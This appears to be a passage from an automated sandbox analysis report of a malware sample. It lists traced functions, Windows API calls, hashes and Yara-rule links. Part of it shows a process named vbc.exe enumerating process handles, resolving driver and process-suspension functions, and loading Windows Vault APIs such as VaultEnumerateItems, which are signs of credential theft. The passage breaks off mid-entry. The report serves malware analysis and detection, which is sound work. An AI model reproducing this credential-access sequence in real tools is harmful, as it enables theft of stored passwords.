String ID:
API String ID: 2063062207-0
Opcode ID: 78e77e7b50fe2c76745b4a5658819fac10ddb8050f63c58e3f981f2ed7f1319e
Instruction ID: e4bc65b80f9cd988d7c614abcd6804025c057b9663e01efb7cea4afda9ac3fbc
Opcode Fuzzy Hash: 78e77e7b50fe2c76745b4a5658819fac10ddb8050f63c58e3f981f2ed7f1319e
Instruction Fuzzy Hash: 775154B49046498FDB14DFAAC548BEEBBF4EF88304F248459E059B7390D774A844CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00DE6BF4, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00DE6C58
GetCurrentThread.KERNEL32 ref: 00DE6C95
GetCurrentProcess.KERNEL32 ref: 00DE6CD2
GetCurrentThreadId.KERNEL32 ref: 00DE6D2B

Memory Dump Source

Source File: 00000007.00000002.361474508.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 37f38da8c937c96018108d71b6e68498e129fddb7d3ded1cd17fc061e08fd918
Instruction ID: 536f7d551a55f9b258a20c572c0d485ef0110fd0670e96d023942044b59e80d7
Opcode Fuzzy Hash: 37f38da8c937c96018108d71b6e68498e129fddb7d3ded1cd17fc061e08fd918
Instruction Fuzzy Hash: E65164B49046498FDB14DFAAC548BEEBBF0EF88304F248459E499B7390D774A844CF65

Uniqueness

Uniqueness Score: -1.00%

Function 07A68FC0, Relevance: 1.7, APIs: 1, Instructions: 223threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 07A6A469

Memory Dump Source

Source File: 00000007.00000002.366819234.0000000007A60000.00000040.00000010.sdmp, Offset: 07A60000, based on PE: false

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 79a37ff99adc2de572d9df3fd7aef0aa4afa5ae577a39495d0de58c76ad57ee1
Instruction ID: 2180d13525196c6213c27a8d7a89f1448dcd28b25e86fe815b7161858cc5fe27
Opcode Fuzzy Hash: 79a37ff99adc2de572d9df3fd7aef0aa4afa5ae577a39495d0de58c76ad57ee1
Instruction Fuzzy Hash: 53819AB0D042199FCB14DFA5C858AEEBBF5EF88304F14C42AD415BB250DB74A946CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DEBC18, Relevance: 1.7, APIs: 1, Instructions: 202COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00DEBE6E

Memory Dump Source

Source File: 00000007.00000002.361474508.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 9fc308d735c36306b46f02ec5987065c95691c40ac7d170e57d2bc0f9f381a4a
Instruction ID: 4d2fa019623da2af72dcd2fbc8342a09c2b3321a507b8ce9b28f16557b44b2bd
Opcode Fuzzy Hash: 9fc308d735c36306b46f02ec5987065c95691c40ac7d170e57d2bc0f9f381a4a
Instruction Fuzzy Hash: AC813370A00B458FD724EF6AD44179BBBF1FF88314F14892AE48AD7A50DB75E8058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 04F7BF50, Relevance: 1.7, APIs: 1, Instructions: 176COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000014,?,?,03AA4278,02ABFCF0,?,00000000), ref: 04F7C0BE

Memory Dump Source

Source File: 00000007.00000002.364903889.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: false

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 111ffcc56e82f96f0ccd23f8c49d95176f8da5a7722e3da40695d51f3b70d77a
Instruction ID: 542f97245ea751e481fea4a0d635a048853a07bb83090588f309ecb39b7de07f
Opcode Fuzzy Hash: 111ffcc56e82f96f0ccd23f8c49d95176f8da5a7722e3da40695d51f3b70d77a
Instruction Fuzzy Hash: 1A719D74A01248AFCB15DFA9D884DAEBBB2FF49714B114099F901AB361DB35E882CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00DEDCCD, Relevance: 1.6, APIs: 1, Instructions: 120COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00DEDDEA

Memory Dump Source

Source File: 00000007.00000002.361474508.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 316eab81cbf592368ab84464d9d186d66876ae0cf00f0e64fc4f5f6aea842403
Instruction ID: a01fc1c317e45fcfc916e358f319bcd4f03a7e672a1367f9c4dcb4c72e6951cd
Opcode Fuzzy Hash: 316eab81cbf592368ab84464d9d186d66876ae0cf00f0e64fc4f5f6aea842403
Instruction Fuzzy Hash: BD51C3B1D00349DFDB14CFAAC884ADEBBB5FF88314F24812AE419AB210D7759945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04F7A060, Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00000000,?,?), ref: 04F7E3B3

Memory Dump Source

Source File: 00000007.00000002.364903889.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: false

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: ad776c5172b63163a48fd755009407652a176f6c8236819dc19d733f89479797
Instruction ID: a35b4dce5af185787c2e0fb7c550d75f9e2a894319e5ddd49a5c6e98c5359cff
Opcode Fuzzy Hash: ad776c5172b63163a48fd755009407652a176f6c8236819dc19d733f89479797
Instruction Fuzzy Hash: E83106717042104FE714A6698811ABE7AAADFC5714F0444AFE50DDB391DE6DFC0387B6

Uniqueness

Uniqueness Score: -1.00%

Function 00DEDCD8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00DEDDEA

Memory Dump Source

Source File: 00000007.00000002.361474508.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 4bf405298a9515739f7375cce99e1a5c46cf95ff01ae054d26b3f31c3c18f197
Instruction ID: 55d1c77ac205f723fe82966d427900fc86bd6f98008a81466c0624c512f4f7b4
Opcode Fuzzy Hash: 4bf405298a9515739f7375cce99e1a5c46cf95ff01ae054d26b3f31c3c18f197
Instruction Fuzzy Hash: 4741B1B5D00349DFDB14DF9AC884ADEBBB5FF88314F24852AE419AB210DB749985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 072B5788, Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 072B8F9A

Memory Dump Source

Source File: 00000007.00000002.366342738.00000000072B0000.00000040.00000001.sdmp, Offset: 072B0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: eb037ff630e1af0b952db65c026a81adac51a1a431ea5a510e182b3c42471c51
Instruction ID: fd1a0b1934f06295e597044243001e32c08d2a324473ee59710e085581a723f3
Opcode Fuzzy Hash: eb037ff630e1af0b952db65c026a81adac51a1a431ea5a510e182b3c42471c51
Instruction Fuzzy Hash: 483136B0D2024ADFDB24CFA8C8847DEBBF6FB18354F14852AE819E7240D774A441CB95

Uniqueness

Uniqueness Score: -1.00%

Function 072B8EC4, Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 072B8F9A

Memory Dump Source

Source File: 00000007.00000002.366342738.00000000072B0000.00000040.00000001.sdmp, Offset: 072B0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b8c0d20836c27f31d89d3bdf50f7a80d43d739c0481285b6f4524d5640764477
Instruction ID: be2629a4e9394fb1e7ed139c17b2cd7d10b64cea78302bebf5802c2dcf2727f4
Opcode Fuzzy Hash: b8c0d20836c27f31d89d3bdf50f7a80d43d739c0481285b6f4524d5640764477
Instruction Fuzzy Hash: F13137B0D1024ADFDB24CFA9C485BDEBBB5FB18354F14852AE819E7240D774A441CF95

Uniqueness

Uniqueness Score: -1.00%

Function 07A666B8, Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 07A66740

Memory Dump Source

Source File: 00000007.00000002.366819234.0000000007A60000.00000040.00000010.sdmp, Offset: 07A60000, based on PE: false

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: a8c5dd1941dbe84929bd124fc24477904dab6f670fb8985a4628d39c0fb19315
Instruction ID: 77ef9474823ee2458f93606ef67e03d5fc69b9f9321160f8184850343b829c44
Opcode Fuzzy Hash: a8c5dd1941dbe84929bd124fc24477904dab6f670fb8985a4628d39c0fb19315
Instruction Fuzzy Hash: 7131E2B0D01249DFDB10CF99C988BDEBBF5AF48318F248469E105BB290D7746949CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00DE6E19, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00DE6EA7

Memory Dump Source

Source File: 00000007.00000002.361474508.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0bf01052929c69ae001f12e0e5c85aeff32ecb4f143d37e7fda772ff17a18d49
Instruction ID: 0ad48717df09eecf482526caf2d2a427266db63eef0a2917031a6d7d481c7551
Opcode Fuzzy Hash: 0bf01052929c69ae001f12e0e5c85aeff32ecb4f143d37e7fda772ff17a18d49
Instruction Fuzzy Hash: 4921E6B5901248DFDB10CFAAD484AEEBFF8FB48324F14841AE914A7351D374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DE6E20, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00DE6EA7

Memory Dump Source

Source File: 00000007.00000002.361474508.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 5a50cf7da0be5c4e37b0b8f30fcfb2a1ea1bd8c470f5745c3842c76dcd0c33a8
Instruction ID: 9458421577fc2dbbefb1c36f1cd0b6e05c25c3d14c7cc879267afb0d2f2e6e2e
Opcode Fuzzy Hash: 5a50cf7da0be5c4e37b0b8f30fcfb2a1ea1bd8c470f5745c3842c76dcd0c33a8
Instruction Fuzzy Hash: 8721C4B5901249DFDB10CFAAD584ADEBBF8FB48324F14841AE914A7350D374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DEB110, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00DEBEE9,00000800,00000000,00000000), ref: 00DEC0FA

Memory Dump Source

Source File: 00000007.00000002.361474508.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3cb9d1e7458858475880ef26a875d42f6a3dac6171c9c3ea58bcc0862a294d13
Instruction ID: 4a31cdfe6a9e0a3e558605905799a98b199d522db92f5804afcc094da07c2072
Opcode Fuzzy Hash: 3cb9d1e7458858475880ef26a875d42f6a3dac6171c9c3ea58bcc0862a294d13
Instruction Fuzzy Hash: EF11F2B6900249DBDB10DFAAD444BEEBBF4AB88314F14842AE519B7600C375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07A690D0, Relevance: 1.6, APIs: 1, Instructions: 55windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,07A6B362,00000000,00000000,03AA4278,02ABFCF0), ref: 07A6B7B0

Memory Dump Source

Source File: 00000007.00000002.366819234.0000000007A60000.00000040.00000010.sdmp, Offset: 07A60000, based on PE: false

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 67f8a8a55461aa76be1abb20793c67b50abf1b28669eced98168ae01b5c93630
Instruction ID: f9626dd3f8969709cab1f752dcccceee0e9929626c45d1b86ef5b03fbb032c82
Opcode Fuzzy Hash: 67f8a8a55461aa76be1abb20793c67b50abf1b28669eced98168ae01b5c93630
Instruction Fuzzy Hash: ED1129B5C00209DFDB10CF9AD484BEEBBF8FB48320F14842AE514A3241C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DEC08F, Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00DEBEE9,00000800,00000000,00000000), ref: 00DEC0FA

Memory Dump Source

Source File: 00000007.00000002.361474508.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 68101cf74128973453b393cbba0965c66ffd54fbbee3cbdf8c5f80c4b583fc01
Instruction ID: a33b2e274678848270f127422c558c35282e166b9bb649fe05b8104fadbbdb81
Opcode Fuzzy Hash: 68101cf74128973453b393cbba0965c66ffd54fbbee3cbdf8c5f80c4b583fc01
Instruction Fuzzy Hash: 071100B6C00249CFDB10CFAAD444AEEFBF4AB88324F14842EE519B7600C375A945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 07A648BC, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?), ref: 07A65BBF

Memory Dump Source

Source File: 00000007.00000002.366819234.0000000007A60000.00000040.00000010.sdmp, Offset: 07A60000, based on PE: false

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 9c0998826574750e89d209db2d4badb574d9c2c97c34edd3044952380fde3cab
Instruction ID: d3a2a6d5faf2fe493edcdf0d33bfc3a3dc17ab1f53f20ba28bd94719e474bfa6
Opcode Fuzzy Hash: 9c0998826574750e89d209db2d4badb574d9c2c97c34edd3044952380fde3cab
Instruction Fuzzy Hash: 171125B5D002098FDB10DF9AC448BDEBBF8EB88324F24885AD519B7640D774A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07A66B38, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?), ref: 07A68DB8

Memory Dump Source

Source File: 00000007.00000002.366819234.0000000007A60000.00000040.00000010.sdmp, Offset: 07A60000, based on PE: false

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 7388463647bc669f087eb3f343c3e191e35a481d00ebd5f25c20277a18dec79c
Instruction ID: 731bfe46af66d0754b91e920dad865f3c2583c8593481b5af161b1f605b8961e
Opcode Fuzzy Hash: 7388463647bc669f087eb3f343c3e191e35a481d00ebd5f25c20277a18dec79c
Instruction Fuzzy Hash: 4D1148B5901209CFDB10CF99C449BEEBBF8EB58320F14842AE614B3741D338A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07A6A800, Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 07A6A85D

Memory Dump Source

Source File: 00000007.00000002.366819234.0000000007A60000.00000040.00000010.sdmp, Offset: 07A60000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: c0214bd66ce6f552dbc6899e8226e03e83db0d4e5ff544f9aa1566849e078a51
Instruction ID: b28d266adcf041fe7a00a31288f82942523228aeeddecbc70768caabc12c7fae
Opcode Fuzzy Hash: c0214bd66ce6f552dbc6899e8226e03e83db0d4e5ff544f9aa1566849e078a51
Instruction Fuzzy Hash: 6611F5B58002099FDB10CF99C845BEEBBF8EB58324F14842AE554A3641D378A984CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00DEB284, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 00DEDF7D

Memory Dump Source

Source File: 00000007.00000002.361474508.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 1f27c94ba544bfa3f4fbb4fcc8f8d3ce62074321aff1fac34050ff08037e36c8
Instruction ID: 995a681d7d003f90aa3cc80262d529121c1fb6eb239600b9755092137d04ecd4
Opcode Fuzzy Hash: 1f27c94ba544bfa3f4fbb4fcc8f8d3ce62074321aff1fac34050ff08037e36c8
Instruction Fuzzy Hash: CE11F5B58042499FDB10DF9AD484BDEBBF8EB48324F14841AE919A7700C774A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DEBE08, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00DEBE6E

Memory Dump Source

Source File: 00000007.00000002.361474508.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 421cc5a8a39d7ff32fdd0855e71dd444ab98024f0eca9b82417c2e041913d016
Instruction ID: eb9aa073678c269665e74bbed0afec7c5cc296f4bf0e37ca51c75d22d26ce885
Opcode Fuzzy Hash: 421cc5a8a39d7ff32fdd0855e71dd444ab98024f0eca9b82417c2e041913d016
Instruction Fuzzy Hash: 5F11DFB6C006498FDB10DF9AD444BDFFBF4EB88724F18852AD529A7610C374A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DEDF18, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 00DEDF7D

Memory Dump Source

Source File: 00000007.00000002.361474508.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: b27bcbc4eb17e81967d18698573e5ee261c6207aa4ddd030870e0b9061e43215
Instruction ID: 5cf75a6708617c59baf72ae79e86e296742ec4ab2acaefdf2660685becbc6c89
Opcode Fuzzy Hash: b27bcbc4eb17e81967d18698573e5ee261c6207aa4ddd030870e0b9061e43215
Instruction Fuzzy Hash: 1911F2B58002499FDB10DF99D585BEEBBF8EF48324F14841AE919A7700C374AA44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07A65EC4, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 07A665C5

Memory Dump Source

Source File: 00000007.00000002.366819234.0000000007A60000.00000040.00000010.sdmp, Offset: 07A60000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 29176cb6971f6440ca618c5223ef66494856794d402ade8a87e1ff2f7081e570
Instruction ID: 7861da0c148523b647f62ecb576bbaee7009f50d0d026c5ac5f9205bb02bd9a6
Opcode Fuzzy Hash: 29176cb6971f6440ca618c5223ef66494856794d402ade8a87e1ff2f7081e570
Instruction Fuzzy Hash: 461112B5900249CFCB10DFAAD449BDEBBF8EB88324F14886AD519B7700D374A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07A6911C, Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,07A6B4A7), ref: 07A6BE9D

Memory Dump Source

Source File: 00000007.00000002.366819234.0000000007A60000.00000040.00000010.sdmp, Offset: 07A60000, based on PE: false

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 6b46c54a8367ff931cbfa83e14c6d575d048fbeeee1559db6d6dbdbd036b8cc7
Instruction ID: a207761e0310be60e885acc74cf96d9159867037d0019570190fac584337344c
Opcode Fuzzy Hash: 6b46c54a8367ff931cbfa83e14c6d575d048fbeeee1559db6d6dbdbd036b8cc7
Instruction Fuzzy Hash: F31122B5C04609CFCB10CF9AD448BDEBBF4EB48324F14842AE529B3240D378A544CFA5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00DEFED9, Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.361474508.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6005ed7bb02a49c302169d9300bf3fd0549dac370c4adf31308540d76e6e9428
Instruction ID: e3744b244f8cfcf537a4f0c227a1ef0bc0602dca1cd71cfcc8c3ade3662d1405
Opcode Fuzzy Hash: 6005ed7bb02a49c302169d9300bf3fd0549dac370c4adf31308540d76e6e9428
Instruction Fuzzy Hash: 14213471E052289FDB00EFA5D854BEEBBB1FB49304F1441AAD900B7390DB785A49CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04F7A559, Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.364903889.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d180ef2f36925d2be747fe3f26d6fe93e613ab0f0aed6ffdbcfdf7c254672b3
Instruction ID: 429d1bdc6191994f00431f293dbc1372ba3261b92fa91422d1bd6768844549eb
Opcode Fuzzy Hash: 4d180ef2f36925d2be747fe3f26d6fe93e613ab0f0aed6ffdbcfdf7c254672b3
Instruction Fuzzy Hash: 4321F470E01209DFDB04DFA8C584BEDB7B1BF48309F5545AAD404A7295D774AF82CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04F7A568, Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.364903889.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9c088dc9c7492922b6efacc451ef9638d845b2840527afb7c13c4ffe5866402
Instruction ID: 006c689bce79cc0574b59e71e4d5249a7f3c8ba21faae43b3df813abde2bcde2
Opcode Fuzzy Hash: f9c088dc9c7492922b6efacc451ef9638d845b2840527afb7c13c4ffe5866402
Instruction Fuzzy Hash: B421F370E00209DFDB04DFA8C584BEEB7B5FF48309F5449AAD405A7294D774AB82CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04F79EF5, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.364903889.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4279fb7a376c8f0292a8cc686e6e49d209be210cad85753f9b6f9ddfa214db3
Instruction ID: 886b3f3320704c1f07359afcde2ec8e51b481f42322c514c09a574393e282760
Opcode Fuzzy Hash: f4279fb7a376c8f0292a8cc686e6e49d209be210cad85753f9b6f9ddfa214db3
Instruction Fuzzy Hash: ECB09276E0000896EB00CEC4A0003FDF770E782226F002067C208B350092B4966956AA

Uniqueness

Uniqueness Score: -1.00%

Function 04F79A2D, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.364903889.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4279fb7a376c8f0292a8cc686e6e49d209be210cad85753f9b6f9ddfa214db3
Instruction ID: 1649c48b293ae56a488a4a1ea77f0c57f324a4a252cb910709bbfbfd9de57903
Opcode Fuzzy Hash: f4279fb7a376c8f0292a8cc686e6e49d209be210cad85753f9b6f9ddfa214db3
Instruction Fuzzy Hash: D3B09276E0100896EB008EC4A0003FCF770E7C2226F002063C608B3500A2749669669A

Uniqueness

Uniqueness Score: -1.00%

Function 04F72B75, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.364903889.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4279fb7a376c8f0292a8cc686e6e49d209be210cad85753f9b6f9ddfa214db3
Instruction ID: 0037b57487ab257cf1789c930645a0f82e8c5c623c415581b779dd1f8fb23158
Opcode Fuzzy Hash: f4279fb7a376c8f0292a8cc686e6e49d209be210cad85753f9b6f9ddfa214db3
Instruction Fuzzy Hash: 0FB09236E0000896CF008EC8A0003FCF770E782226F0120A3C208B350092349669569A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exe PID: 6692 Parent PID: 6044 vbc.exeCOMMON

Executed Functions

Function 00408836, Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 234filenativeCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040885E

Part of subcall function 0040757A: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040AB83,00000000,0040AA36,?,00000000,00000208,?), ref: 00407585

CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 00408885

Part of subcall function 004085EB: ??2@YAPAXI@Z.MSVCRT ref: 004085F4

Part of subcall function 0040FC89: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,004088B3,?,000000FF,00000000,00000104), ref: 0040FC9C
Part of subcall function 0040FC89: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 0040FCB3
Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0040FCC5
Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0040FCD7
Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0040FCE9
Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0040FCFB
Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtQueryObject), ref: 0040FD0D
Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 0040FD1F
Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtResumeProcess), ref: 0040FD31

NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 004088C6
FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 004088EF
GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 004088FA
_wcsicmp.MSVCRT ref: 0040898B
_wcsicmp.MSVCRT ref: 0040899E
_wcsicmp.MSVCRT ref: 004089B1
OpenProcess.KERNEL32(00000040,00000000,00000000,?,?,000000FF,00000000,00000104), ref: 004089C5
GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 00408A0B
DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 00408A1A
memset.MSVCRT ref: 00408A38
CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 00408A6B
_wcsicmp.MSVCRT ref: 00408A8B
CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 00408ACB
FreeLibrary.KERNELBASE(?,?,?,000000FF,00000000,00000104), ref: 00408AED

Strings

taskhost.exe, xrefs: 00408996
dllhost.exe, xrefs: 00408982
taskhostex.exe, xrefs: 004089A9

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindFreeInformationLibraryNameNotificationOpenQuerySystem
String ID: dllhost.exe$taskhost.exe$taskhostex.exe
API String ID: 1954110673-3398334509
Opcode ID: 4d8f3214a43bd04c3f84bf4d7629163f604b80433559b2a465285cddf8bf93b4
Instruction ID: ac6d74245de41f4a68afaf46936feeb9e4215e23a81ac82868d75cf9687b4f7b
Opcode Fuzzy Hash: 4d8f3214a43bd04c3f84bf4d7629163f604b80433559b2a465285cddf8bf93b4
Instruction Fuzzy Hash: FB9115B1D00209AFDB10EF95C985AAEBBB5FF04305F60447FE949B6291DB399E40CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004422C7, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(vaultcli.dll,?,00000000,00442385,?,00000000,?), ref: 004422D4
GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 004422E9
GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 004422F6
GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 00442303
GetProcAddress.KERNEL32(00000000,VaultFree), ref: 00442310
GetProcAddress.KERNEL32(00000000,VaultGetInformation), ref: 0044231D
GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0044232B
GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 00442334

Strings

VaultEnumerateItems, xrefs: 004422F8
VaultCloseVault, xrefs: 004422EB
VaultGetInformation, xrefs: 00442312
VaultOpenVault, xrefs: 004422E0
VaultGetItem, xrefs: 0044231F, 00442324, 0044232D
vaultcli.dll, xrefs: 004422CF
VaultFree, xrefs: 00442305

Memory Dump Source

